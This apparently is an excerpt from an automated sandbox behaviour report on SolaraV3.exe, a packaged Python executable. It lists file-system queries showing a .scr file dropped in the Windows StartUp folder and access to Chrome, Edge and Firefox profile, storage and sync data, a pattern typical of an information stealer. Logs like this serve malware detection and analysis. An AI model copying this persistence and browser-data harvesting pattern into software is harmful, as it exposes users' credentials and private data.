Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation	Jump to behavior
